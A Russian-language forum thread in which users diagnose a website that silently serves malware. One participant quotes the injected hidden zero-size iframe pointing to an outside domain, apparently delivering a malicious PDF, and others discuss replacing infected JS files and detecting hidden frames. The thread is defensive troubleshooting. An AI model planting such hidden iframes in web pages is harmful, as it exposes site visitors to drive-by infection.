[Sham]

скрытую загрузку можно по-разному сделать, в т.ч. через редирект...

Цитата AACC:

я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил »

хехе... за такие загрузки ему мб денюжка капает...

тема перенесена из раздела "Вебмастеру"

[sanek_freeman]

AACC, здравствуйте. Выполните рекомендации и прикрепите к следующему сообщению полученные логи.

[AACC]

Sham, тот админ к этим загрузкам не причем... он сам попросил меня чтоб я гдето спросил

sanek_freeman, мне не мой компьютор лечить нужно, а тот сайт

[Drongo]

Цитата AACC:

мне не мой компьютор лечить нужно, а тот сайт »

Зарегистрируйтесь на форуме и оставьте заявку в этой теме - Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте тут

[Sham]

вверху, где баннер, каким-то скриптом суется iframe

HTML код:

<iframe width="0" height="0" src="http://herewereytinj.com/tera/sv777/index.php"></iframe>

очевидно, в него и подгружается pdf со скриптом (который выполняется очевидно только акробат-ридере).

Рекламные скрипты размещает админ, значит, пусть проверяет все скрипты рекламодателей.

[AACC]

спасибо всем за помощь

сайт от вирусов отчистился... вирус скрывался в JS файлах
в данном случаи они скрывались в папке \engine\ajax
menu.js
js_edit.js
dle_ajax.js

админ перелил на оригенальные файлы и вирус исчез

вопрос как можно было их изменить так чтоб дата редактирования не изменилась?

п.с.

кстати есть для примера 1 файл с вирусом
если хотите могу показать

я его проверил касперским и там оказался вирус

[Sham]

Сейчас скрытый фрейм как и был, никуда не исчез, но src редиректит на 404 (удален из удаленного хоста).

[AACC]

Sham, каким способом ты видишь скрытый фрейм?

[Sham]

FF + noscript (вверху слева квадратик - типа заблокирован фрейм), или через DOM (например, FF + firebug).

Теперь исчез вроде , видимо у меня в кэше завалялось...